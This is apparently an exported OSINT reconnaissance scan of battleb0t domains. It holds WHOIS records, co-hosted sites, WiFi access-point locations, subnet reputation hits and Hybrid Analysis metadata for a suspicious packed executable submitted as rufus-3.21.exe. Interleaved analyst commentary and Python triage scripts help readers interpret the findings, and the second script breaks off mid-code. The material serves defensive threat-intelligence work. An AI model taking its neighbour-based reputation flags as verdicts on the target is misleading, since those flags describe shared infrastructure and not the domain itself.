| 2023-05-12 03:27:00 | Web Server | No | Web Server Identifier | 0 | 0 | 4 | 0 | None | cloudflare | {"x-content-type-options": "nosniff", "content-encoding": "gzip", "transfer-encoding": "chunked", "expires": "Fri, 12 May 2023 04:54:13 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "last-modified": "Fri, 28 Apr 2023 14:11:18 GMT", "connection": "keep-alive", "etag": "W/\"644bd406-19c8\"", "cache-control": "max-age=7200, public", "date": "Fri, 12 May 2023 02:54:13 GMT", "cf-ray": "7c5f6036af1541db-EWR", "content-type": "text/css", "x-frame-options": "DENY"} |
| 2023-05-12 02:54:19 | Linked URL - Internal | No | Web Spider | 6 | 0 | 2 | 0 | None | https://fluid.battleb0t.xyz/ | fluid.battleb0t.xyz |
| 2023-05-12 03:18:49 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | <no ssid> (Net ID: 00:02:2D:35:DF:56) | 34.0544, -118.244 |
| 2023-05-12 03:23:40 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.96.15:443 | 188.114.96.0/24 |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | ATT6WEI6hJ (Net ID: D4:B2:7A:43:F2:C2) | 37.751, -97.822 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | linksys (Net ID: 00:18:39:E0:85:F6) | 32.8608, -79.9746 |
| 2023-05-12 03:09:27 | Co-Hosted Site | No | SSL Certificate Analyzer | 0 | 0 | 2 | 0 | None | sni.cloudflaressl.com | 188.114.97.1 |
| 2023-05-12 03:32:52 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 3 | 0 | None | cf-ray: 7c5f8c594cb34339-EWR | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=fiT%2Fr8CwWrAQPZkt8VpkeQoVoGOR6HuHPRasaTPIcW93tfGJar9pTikOfGdSWQA5SZHUpCyuk56gghqLlY9yU5dVDbV5Bs9yRYYuQ0D9hZe3tyWEFUstq9XRCg%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 03:24:21 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f8c594cb34339-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 02:44:12 | Co-Hosted Site | No | SSL Certificate Analyzer | 1 | 0 | 2 | 0 | None | cloudwaysapps.com | kekw.battleb0t.xyz |
| 2023-05-12 03:31:32 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 3 | 0 | None | e8887bc7fc7c4eb4aed3e14ba45fe97d.protect@withheldforprivacy.com | Domain Name: battleb0t.wtf
Registry Domain ID: 210affc107bd4562ba433c931d79c2d0-DONUTS
Registrar WHOIS Server: whois.namecheap.com
Registrar URL: https://www.namecheap.com/
Updated Date: 2023-02-15T17:41:17Z
Creation Date: 2023-02-10T17:40:28Z
Registry Expiry Date: 2024-02-10T17:40:28Z
Registrar: NameCheap, Inc.
Registrar IANA ID: 1068
Registrar Abuse Contact Email: abuse@namecheap.com
Registrar Abuse Contact Phone: +1.9854014545
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registry Registrant ID: REDACTED FOR PRIVACY
Registrant Name: REDACTED FOR PRIVACY
Registrant Organization: Privacy service provided by Withheld for Privacy ehf
Registrant Street: REDACTED FOR PRIVACY
Registrant City: REDACTED FOR PRIVACY
Registrant State/Province: Capital Region
Registrant Postal Code: REDACTED FOR PRIVACY
Registrant Country: IS
Registrant Phone: REDACTED FOR PRIVACY
Registrant Phone Ext: REDACTED FOR PRIVACY
Registrant Fax: REDACTED FOR PRIVACY
Registrant Fax Ext: REDACTED FOR PRIVACY
Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registry Admin ID: REDACTED FOR PRIVACY
Admin Name: REDACTED FOR PRIVACY
Admin Organization: REDACTED FOR PRIVACY
Admin Street: REDACTED FOR PRIVACY
Admin City: REDACTED FOR PRIVACY
Admin State/Province: REDACTED FOR PRIVACY
Admin Postal Code: REDACTED FOR PRIVACY
Admin Country: REDACTED FOR PRIVACY
Admin Phone: REDACTED FOR PRIVACY
Admin Phone Ext: REDACTED FOR PRIVACY
Admin Fax: REDACTED FOR PRIVACY
Admin Fax Ext: REDACTED FOR PRIVACY
Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registry Tech ID: REDACTED FOR PRIVACY
Tech Name: REDACTED FOR PRIVACY
Tech Organization: REDACTED FOR PRIVACY
Tech Street: REDACTED FOR PRIVACY
Tech City: REDACTED FOR PRIVACY
Tech State/Province: REDACTED FOR PRIVACY
Tech Postal Code: REDACTED FOR PRIVACY
Tech Country: REDACTED FOR PRIVACY
Tech Phone: REDACTED FOR PRIVACY
Tech Phone Ext: REDACTED FOR PRIVACY
Tech Fax: REDACTED FOR PRIVACY
Tech Fax Ext: REDACTED FOR PRIVACY
Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Name Server: dns1.registrar-servers.com
Name Server: dns2.registrar-servers.com
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2023-05-12T03:15:08Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
Terms of Use: Access to WHOIS information is provided to assist persons in determining the contents of a domain name registration record in the registry database. The data in this record is provided by Identity Digital or the Registry Operator for informational purposes only, and accuracy is not guaranteed. This service is intended only for query-based access. You agree that you will use this data only for lawful purposes and that, under no circumstances will you use this data to (a) allow, enable, or otherwise support the transmission by e-mail, telephone, or facsimile of mass unsolicited, commercial advertising or solicitations to entities other than the data recipient's own existing customers; or (b) enable high volume, automated, electronic processes that send queries or data to the systems of Registry Operator, a Registrar, or Identity Digital except as reasonably necessary to register domain names or modify existing registrations. When using the Whois service, please consider the following: The Whois service is not a replacement for standard EPP commands to the SRS service. Whois is not considered authoritative for registered domain objects. The Whois service may be scheduled for downtime during production or OT&E maintenance periods. Queries to the Whois services are throttled. If too many queries are received from a single IP address within a specified time, the service will begin to reject further queries for a period of time to prevent disruption of Whois service access. Abuse of the Whois system through data mining is mitigated by detecting and limiting bulk query access from single sources. Where applicable, the presence of a [Non-Public Data] tag indicates that such data is not made publicly available due to applicable data privacy laws or requirements. Should you wish to contact the registrant, please refer to the Whois records available through the registrar URL listed above. 
Access to non-public data may be provided, upon request, where it can be reasonably confirmed that the requester holds a specific legitimate interest and a proper legal basis for accessing the withheld data. Access to this data provided by Identity Digital can be requested by submitting a request via the form found at https://www.identity.digital/about/policies/whois-layered-access/. The Registrar of Record identified in this output may have an RDDS service that can be queried for additional information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Identity Digital Inc. and Registry Operator reserve the right to modify these terms at any time. By submitting this query, you agree to abide by this policy.
Domain name: battleb0t.wtf
Registry Domain ID: 210affc107bd4562ba433c931d79c2d0-DONUTS
Registrar WHOIS Server: whois.namecheap.com
Registrar URL: http://www.namecheap.com
Updated Date: 0001-01-01T00:00:00.00Z
Creation Date: 2023-02-10T17:40:28.99Z
Registrar Registration Expiration Date: 2024-02-10T17:40:28.99Z
Registrar: NAMECHEAP INC
Registrar IANA ID: 1068
Registrar Abuse Contact Email: abuse@namecheap.com
Registrar Abuse Contact Phone: +1.9854014545
Reseller: NAMECHEAP INC
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: addPeriod https://icann.org/epp#addPeriod
Registry Registrant ID:
Registrant Name: Redacted for Privacy
Registrant Organization: Privacy service provided by Withheld for Privacy ehf
Registrant Street: Kalkofnsvegur 2
Registrant City: Reykjavik
Registrant State/Province: Capital Region
Registrant Postal Code: 101
Registrant Country: IS
Registrant Phone: +354.4212434
Registrant Phone Ext:
Registrant Fax:
Registrant Fax Ext:
Registrant Email: e8887bc7fc7c4eb4aed3e14ba45fe97d.protect@withheldforprivacy.com
Registry Admin ID:
Admin Name: Redacted for Privacy
Admin Organization: Privacy service provided by Withheld for Privacy ehf
Admin Street: Kalkofnsvegur 2
Admin City: Reykjavik
Admin State/Province: Capital Region
Admin Postal Code: 101
Admin Country: IS
Admin Phone: +354.4212434
Admin Phone Ext:
Admin Fax:
Admin Fax Ext:
Admin Email: e8887bc7fc7c4eb4aed3e14ba45fe97d.protect@withheldforprivacy.com
Registry Tech ID:
Tech Name: Redacted for Privacy
Tech Organization: Privacy service provided by Withheld for Privacy ehf
Tech Street: Kalkofnsvegur 2
Tech City: Reykjavik
Tech State/Province: Capital Region
Tech Postal Code: 101
Tech Country: IS
Tech Phone: +354.4212434
Tech Phone Ext:
Tech Fax:
Tech Fax Ext:
Tech Email: e8887bc7fc7c4eb4aed3e14ba45fe97d.protect@withheldforprivacy.com
Name Server: dns1.registrar-servers.com
Name Server: dns2.registrar-servers.com
DNSSEC: unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-11T13:15:09.13Z <<<
For more information on Whois status codes, please visit https://icann.org/epp |
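The two WHOIS records above (the thin registry record and the thick registrar record for battleb0t.wtf) carry the details a triage analyst actually wants: how old the domain was at scan time, whether the contacts are a privacy proxy, whether DNSSEC is enabled, and which EPP status codes are set. The script below is an added example, not SpiderFoot or registry code; it parses a constructed excerpt of the registrar record shown on this page, the 180-day "newly registered" threshold is an assumption, and the list of privacy-proxy markers is one the reader should extend.

```python
"""Triage a registrar WHOIS record the way an analyst would read it.

Added example, not SpiderFoot or registry code.  WHOIS_EXCERPT is a
constructed excerpt of the battleb0t.wtf registrar record on this page;
NEW_DOMAIN_DAYS and PRIVACY_PROXY_MARKERS are assumptions to tune locally.
"""
from __future__ import annotations

import re
from datetime import datetime, timezone

# Timestamp of the row the record was captured in ("Date Found" column).
SCAN_TIME = datetime(2023, 5, 12, 3, 31, 32, tzinfo=timezone.utc)
NEW_DOMAIN_DAYS = 180  # assumed threshold; teams commonly use 30-180 days

# Strings that identify a WHOIS privacy/proxy service rather than a registrant.
PRIVACY_PROXY_MARKERS = ("withheldforprivacy.com", "withheld for privacy", "redacted for privacy")

WHOIS_EXCERPT = """\
Domain name: battleb0t.wtf
Registrar WHOIS Server: whois.namecheap.com
Creation Date: 2023-02-10T17:40:28.99Z
Registrar Registration Expiration Date: 2024-02-10T17:40:28.99Z
Registrar: NAMECHEAP INC
Registrar IANA ID: 1068
Registrar Abuse Contact Email: abuse@namecheap.com
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: addPeriod https://icann.org/epp#addPeriod
Registrant Name: Redacted for Privacy
Registrant Organization: Privacy service provided by Withheld for Privacy ehf
Registrant Email: e8887bc7fc7c4eb4aed3e14ba45fe97d.protect@withheldforprivacy.com
Name Server: dns1.registrar-servers.com
Name Server: dns2.registrar-servers.com
DNSSEC: unsigned
"""

_ISO_PREFIX = re.compile(r"(\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2})")


def parse_whois(text: str) -> dict[str, list[str]]:
    """Parse 'Key: value' lines into a multimap; keys such as Name Server repeat."""
    fields: dict[str, list[str]] = {}
    for line in text.splitlines():
        if ":" not in line or line.startswith(">>>"):
            continue
        key, _, value = line.partition(":")  # first colon only: URLs keep their ':'
        fields.setdefault(key.strip().lower(), []).append(value.strip())
    return fields


def parse_ts(value: str) -> datetime | None:
    """Accept registry and registrar timestamp styles (with or without fractions)."""
    m = _ISO_PREFIX.match(value)
    if not m:
        return None
    return datetime.strptime(m.group(1), "%Y-%m-%dT%H:%M:%S").replace(tzinfo=timezone.utc)


def triage_whois(text: str, now: datetime = SCAN_TIME) -> dict:
    """Summarise the record into the fields a triage decision is based on."""
    f = parse_whois(text)
    created = parse_ts(f.get("creation date", [""])[0])
    age_days = (now - created).days if created else None
    statuses = [v.split()[0] for v in f.get("domain status", [])]
    contact_blob = " ".join(
        f.get("registrant name", []) + f.get("registrant organization", []) + f.get("registrant email", [])
    ).lower()
    return {
        "domain": f.get("domain name", ["?"])[0].lower(),
        "age_days": age_days,
        "newly_registered": age_days is not None and age_days < NEW_DOMAIN_DAYS,
        "privacy_proxy": any(m in contact_blob for m in PRIVACY_PROXY_MARKERS),
        "dnssec": f.get("dnssec", ["unsigned"])[0].lower() != "unsigned",
        "statuses": statuses,
        # The registrar abuse mailbox is the actionable contact when the registrant is proxied.
        "abuse_contact": f.get("registrar abuse contact email", [None])[0],
        "name_servers": [ns.lower() for ns in f.get("name server", [])],
    }


if __name__ == "__main__":
    for k, v in triage_whois(WHOIS_EXCERPT).items():
        print(f"{k:18} {v}")
```

Read together with the row itself: the address in the Affiliate - Email Address column is the proxy service's forwarding alias, not a registrant identity, so it should not be pivoted on as if it were a person; the registrar abuse contact is the one that acts on reports.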
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | <no ssid> (Net ID: 00:00:48:65:F1:BF) | 41.8781, -87.6298 |
| 2023-05-12 02:47:24 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 0, u'threat_score': None, u'compromised_hosts': [], u'environment_id': None, u'major_os_version': None, u'submit_name': u'bounty-60048660704598979', u'signatures': [], u'threat_level': 1, u'size': 1397320, u'job_id': None, u'target_url': None, u'interesting': False, u'error_type': None, u'state': u'SUCCESS', u'entrypoint': None, u'mitre_attcks': [], u'certificates': [], u'hosts': [], u'sha256': u'd0554f1fc47407d678a4d8eace607272013c475033b636bfb1824ed6b1a22e36', u'sha512': u'936ffc79313ebd47ad41f13c5e922d77f4d58c43f0c4df3daf3caff06bf8ca0cb2586c63c685b1c60ffe9d24ce1815ea2fe02d09e4618ba7cef897dffaa01467', u'image_file_characteristics': [], u'submissions': [{u'url': None, u'submission_id': u'644de19185cd7ba33b0ebb77', u'created_at': u'2023-04-30T03:33:37+00:00', u'filename': u'rufus-3.21p.exe'}, {u'url': None, u'submission_id': u'644d328d160fbd497c0249ea', u'created_at': u'2023-04-29T15:06:53+00:00', u'filename': u'bounty-86001166714428459'}, {u'url': None, u'submission_id': u'644d328c2619bb33a2062345', u'created_at': u'2023-04-29T15:06:52+00:00', u'filename': u'bounty-75452711595433687'}, {u'url': None, u'submission_id': u'644d20db3892d3fa3503f45d', u'created_at': u'2023-04-29T13:51:23+00:00', u'filename': u'bounty-69409737173865529'}, {u'url': None, u'submission_id': u'644670e8f6594782e504e063', u'created_at': u'2023-04-24T12:07:04+00:00', u'filename': u'bounty-23683237179354189'}, {u'url': None, u'submission_id': u'64466c020c744eef360e7a3b', u'created_at': u'2023-04-24T11:46:10+00:00', u'filename': u'bounty-54152439984031433'}, {u'url': None, u'submission_id': u'64466c009a197330510ca9de', u'created_at': u'2023-04-24T11:46:08+00:00', u'filename': u'bounty-20187180234839305'}, {u'url': None, u'submission_id': 
u'6440894b2311f94ff3047162', u'created_at': u'2023-04-20T00:37:31+00:00', u'filename': u'bounty-11597493263526310'}, {u'url': None, u'submission_id': u'644028b866dee6f76d08d606', u'created_at': u'2023-04-19T17:45:28+00:00', u'filename': u'bounty-69752916457787705'}, {u'url': None, u'submission_id': u'6440116c41936776ee068346', u'created_at': u'2023-04-19T16:06:04+00:00', u'filename': u'bounty-14153918190732173'}, {u'url': None, u'submission_id': u'643aba2ede3ec5d7d7033f33', u'created_at': u'2023-04-15T14:52:30+00:00', u'filename': u'bounty-36006345838913303'}, {u'url': None, u'submission_id': u'643ab9f92c9d85a9850cc3d5', u'created_at': u'2023-04-15T14:51:37+00:00', u'filename': u'bounty-23074866243363724'}, {u'url': None, u'submission_id': u'642b91bf406da52dd400eac9', u'created_at': u'2023-04-04T02:55:59+00:00', u'filename': u'bounty-62066260028766542'}, {u'url': None, u'submission_id': u'642b91b09f84ad67780669ce', u'created_at': u'2023-04-04T02:55:44+00:00', u'filename': u'bounty-62692702447861562'}, {u'url': None, u'submission_id': u'641a31f9f46795db1a06898d', u'created_at': u'2023-03-21T22:38:49+00:00', u'filename': u'bounty-7657930337676953'}, {u'url': None, u'submission_id': u'6407a5754b329945cc067194', u'created_at': u'2023-03-07T20:58:29+00:00', u'filename': u'rufus-3.21 (1).exe'}, {u'url': None, u'submission_id': u'63eab12d68afe375de3a4bfc', u'created_at': u'2023-02-13T21:52:45+00:00', u'filename': u'rufus-3.21.exe'}, {u'url': None, u'submission_id': u'63bf789acdb4237617605898', u'created_at': u'2023-01-12T03:03:54+00:00', u'filename': u'bounty-44826039870082806'}, {u'url': None, u'submission_id': u'63a889da2274de4da87d35fa', u'created_at': u'2022-12-25T17:35:22+00:00', u'filename': u'bounty-40358777649735610'}, {u'url': None, u'submission_id': u'63907e1b25dc9a507e28a896', u'created_at': u'2022-12-07T11:50:52+00:00', u'filename': u'bounty-60048660704598979'}], u'analysis_start_time': u'2022-12-07T11:50:52+00:00', u'tags': [], u'imphash': None, 
u'total_network_connections': 0, u'av_detect': 0, u'machine_learning_models': [], u'total_signatures': 0, u'image_base': None, u'error_origin': None, u'ssdeep': None, u'entrypoint_section': None, u'md5': u'c2ab67a2561ac7f5add3256fe9bf85d4', u'network_mode': u'default', u'processes': [], u'sha1': u'cc5742d1f128c439740a56734c0e105f11a62fe6', u'url_analysis': False, u'type': u'PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed', u'file_metadata': None, u'dll_characteristics': [], u'vx_family': None, u'environment_description': u'Static Analysis', u'verdict': u'suspicious', u'minor_os_version': None, u'domains': [], u'extracted_files': [], u'type_short': [u'peexe', u'executable']}, {u'subsystem': u'Windows Gui', u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 1, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 110, u'major_os_version': 4, u'submit_name': u'rufus-3.21.exe', u'signatures': [{u'category': u'General', u'origin': u'Static Parser', u'identifier': u'static-96', u'name': u'PE file entrypoint instructions', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 0, u'description': u'"d0554f1fc47407d678a4d8eace607272013c475033b636bfb1824ed6b1a22e36.bin" file has an entrypoint instructions - "pushal,movesi, 0x692015,leaedi, [esi - 0x291015],pushedi,movebp, esp,leaebx, [esp - 0x3e80],xoreax, eax,pusheax,cmpesp, ebx,jne0x7d99b8,incesi,incesi,pushebx,push0x3d72d4,pushedi,addebx, 4,pushebx,push0x147989,pushesi,addebx, 4,pushebx,pusheax,movdword ptr [ebx], 0x20003,pushebp,pushedi,pushesi,pushebx,subesp, 0x7c,movedx, dword ptr [esp + 0x90],movdword ptr [esp + 0x74], 0,movbyte ptr [esp + 0x73], 0,movebp, dword ptr [esp + 0x9c],leaeax, [edx + 4],movdword ptr [esp + 0x78], eax,"'}, {u'category': u'General', u'origin': u'Registry 
Access', u'identifier': u'registry-17', u'name': u'Accesses System Certificates Settings', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1112', u'threat_level_human': u'informative', u'capec_id': u'CAPEC-203', u'attck_id': u'T1112', u'relevance': 10, u'threat_level': 0, u'type': 3, u'description': u'"rufus-3.21.exe" (Path: "HKLM\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\CA\\CERTIFICATES\\D559A586669B08F46A30A133F8A9ED3D038E2EA8"; Key: "BLOB")\n "rufus-3.21.exe" (Path: "HKLM\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\CA\\CERTIFICATES\\FEE449EE0E3965A5246F000E87FDE2A065FD89D4"; Key: "BLOB")\n "rufus-3.21.exe" (Path: "HKLM\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\CA\\CRLS\\A377D1B1C0538833035211F4083D00FECC414DAB"; Key: "BLOB")\n "rufus-3.21.exe" (Path: "HKLM\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\DISALLOWED\\CERTIFICATES\\367D4B3B4FCBBC0B767B2EC0CDB2A36EAB71A4EB"; Key: "BLOB")\n "rufus-3.21.exe" (Path: "HKLM\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\DISALLOWED\\CERTIFICATES\\637162CC59A3A1E25956FA5FA8F60D2E1C52EAC6"; Key: "BLOB")\n "rufus-3.21.exe" (Path: "HKLM\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\DISALLOWED\\CERTIFICATES\\61793FCBFA4F9008309BBA5FF12D2CB29CD4151A"; Key: "BLOB")\n "rufus-3.21.exe" (Path: "HKLM\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\DISALLOWED\\CERTIFICATES\\B86E791620F759F17B8D25E38CA8BE32E7D5EAC2"; Key: "BLOB")\n "rufus-3.21.exe" (Path: "HKLM\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\DISALLOWED\\CERTIFICATES\\B533345D06F64516403C00DA03187D3BFEF59156"; Key: "BLOB")\n "rufus-3.21.exe" (Path: "HKLM\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\DISALLOWED\\CERTIFICATES\\D018B62DC518907247DF50925BB09ACF4A5CB3AD"; Key: "BLOB")\n "rufus-3.21.exe" (Path: "HKLM\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\DISALLOWED\\CERTIFICATES\\CEA586B2CE593EC7D939898337C57814708AB2BE"; Key: "BLOB")\n "rufus-3.21.exe" (Path: "HKLM\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\DISALLOWED\\CERTIFICATES\\F8A54E03AADC5692B850496A4C4630FFEAA29D83"; Key: "BLOB")\n 
"rufus-3.21.exe" (Path: "HKCU\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\ROOT"; Key: "")'}, {u'category': u'General', u'origin': u'Registry Access', u'identifier': u'registry-18', u'name': u'Accesses Software Policy Settings', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1012', u'threat_level_human': u'informative', u'capec_id': u'CAPEC-647', u'attck_id': u'T1012', u'relevance': 10, u'threat_level': 0, u'type': 3, u'description': u'"rufus-3.21.exe" (Path: "HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\CA"; Key: "")\n "rufus-3.21.exe" (Path: "HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\DISALLOWED\\CRLS"; Key: "")\n "rufus-3.21.exe" (Path: "HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\DISALLOWED\\CTLS"; Key: "")\n "rufus-3.21.exe" (Path: "HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\DISALLOWED\\CERTIFICATES"; Key: "")\n "rufus-3.21.exe" (Path: "HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\DISALLOWED"; Key: "")\n "rufus-3.21.exe" (Path: "HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\ROOT\\CTLS"; Key: "")\n "rufus-3.21.exe" (Path: "HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\TRUSTEDPEOPLE"; Key: "")\n "rufus-3.21.exe" (Path: "HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\TRUST\\CRLS"; Key: "")\n "rufus-3.21.exe" (Path: "HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\TRUST\\CERTIFICATES"; Key: "")\n "rufus-3.21.exe" (Path: "HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\TRUST"; Key: "")\n "rufus-3.21.exe" (Path: "HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\TRUST\\CTLS"; Key: "")\n "rufus-3.21.exe" (Path: "HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\TRUST\\CRLS"; Key: "")\n "rufus-3.21.exe" (Path: "HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\TRUST\\CERTIFICATES"; Key: "")\n "rufus-3.21.exe" (Path: "HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\TRUST"; Key: "")\n "rufus-3.21.exe" (Path: 
"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\TRUST\\CTLS"; Key: "")\n "rufus-3.21.exe" (Path: "HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\TRUSTEDPEOPLE\\CTLS"; Key: "")\n "rufus-3.21.exe" (Path: "HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\SYSTEMCERTIFICATES\\TRUSTEDPEOPLE\\CRLS"; Key: "")\n "rufus-3.21.exe" (Path: "HKLM\\SOFTWARE\\POLICIES\\MICROSOF | 185.199.111.153 |
| 2023-05-12 02:44:19 | Software Used | Yes | Tool - Wappalyzer | 0 | 0 | 2 | 0 | None | GitHub Pages | www.battleb0t.xyz |
| 2023-05-12 03:03:59 | Co-Hosted Site | No | ThreatMiner | 0 | 0 | 2 | 0 | None | etherum-libs.github.io | 185.199.109.153 |
| 2023-05-12 03:00:34 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.25): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 02:55:11 | Software Used | Yes | Censys | 0 | 0 | 2 | 0 | None | Dovecot Dovecot | 87.248.157.102 |
| 2023-05-12 03:01:17 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.147): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:00:51 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.76): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 02:46:38 | BGP AS Membership | No | RIPE | 0 | 0 | 4 | 0 | None | 13335 | 104.21.64.0/20 |
| 2023-05-12 03:10:22 | Malicious IP Address | Yes | Threat Jammer | 0 | 1 | 2 | 0 | None | Threat Jammer - Risk score: 40 (MEDIUM)
https://threatjammer.com/info/188.114.96.1 | 188.114.96.1 |
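The Blacklisted IP on Same Subnet, Malicious IP Address and Co-Hosted Site rows above are all keyed on address space the target shares with many unrelated tenants: 188.114.96.0/24 and 104.21.64.0/20 sit in AS13335 (Cloudflare) and 185.199.109-111.153 are the GitHub Pages addresses, as other rows on this page record. Reputation of a neighbour in such a range says nothing about the target. The script below is an added example, not SpiderFoot code; the findings are constructed from rows on this page, and treating 185.199.108.0/22 as the GitHub Pages block is an assumption.

```python
"""Down-rank findings whose evidence is the reputation of a neighbour on a
shared CDN or static-hosting range.  Added example, not SpiderFoot code.
SHARED_RANGES comes from rows on this page; the GitHub Pages /22 is assumed.
"""
from __future__ import annotations

import ipaddress
from dataclasses import dataclass

SHARED_RANGES = {
    "Cloudflare AS13335": [ipaddress.ip_network("188.114.96.0/24"),
                           ipaddress.ip_network("104.21.64.0/20")],
    "GitHub Pages (assumed /22)": [ipaddress.ip_network("185.199.108.0/22")],
}

# Finding types whose evidence concerns the address block or its other tenants,
# not the target host itself.
NEIGHBOUR_TYPES = {"Blacklisted IP on Same Subnet", "Co-Hosted Site", "Malicious IP Address"}


@dataclass(frozen=True)
class Finding:
    ftype: str    # SpiderFoot "Type" column
    data: str     # "Data" column
    source: str   # "Source Data" column: the IP or CIDR the module was fed
    risky: bool   # "Risky Data Type" column


# Constructed from rows on this page.
FINDINGS = [
    Finding("Blacklisted IP on Same Subnet", "Honeypotproject (188.114.96.25): Search Engine", "188.114.96.0/24", True),
    Finding("Malicious IP Address", "Threat Jammer - Risk score: 40 (MEDIUM)", "188.114.96.1", True),
    Finding("Co-Hosted Site", "etherum-libs.github.io", "185.199.109.153", False),
    Finding("Software Used", "Dovecot Dovecot", "87.248.157.102", True),
]


def shared_owner(addr_or_cidr: str) -> str | None:
    """Name the shared range containing the address or CIDR, or None."""
    try:
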